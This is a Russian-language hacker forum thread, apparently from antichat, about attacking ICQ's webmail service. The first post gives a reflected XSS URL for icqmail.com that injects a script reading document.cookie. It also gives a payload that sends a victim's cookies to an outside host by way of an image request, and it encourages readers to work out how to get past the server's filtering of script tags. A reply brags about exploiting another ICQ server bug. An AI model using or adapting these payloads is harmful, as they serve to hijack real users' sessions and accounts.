Для тех кто не знал: На сайте www.icq.com нам предоставляют зарегестрировать мыло. Кому это нужно? Нам не нужно.... нужно им =) Code: http://www.icqmail.com/tnb_single.asp?foldername=options&tabup=?"><script>alert(document.cookie)</script> Довольно распространнённая XSS. Но, как ни странно есть НО. Посылается письмо на мыло [email protected] от наивного чукотского парня с примерно вот таким содержанием Code: <script>img=new Image(); img.src='http://antichat.ru/cgi-bin/s.jpg'+document.cookie;</script> пройдя через сервер "мыльной аськи" наши старания не увенчаются успехом. Начальный и конечный тег скрипта будет искривлён. Мы же простые албанские юноши и девушки можем понять структуру замены нашего кода и вывести нормально рабочий скрипт. Удачи в реале
Неплохо....кстати Я щас и сам раскручиваю сервант асикю, думаю к концу недели предоставлю полный доклад, ибо баг уже найдено впоряде!!! З.Ы. Кто украдет мои идеи, получит по голове )))))))))))))
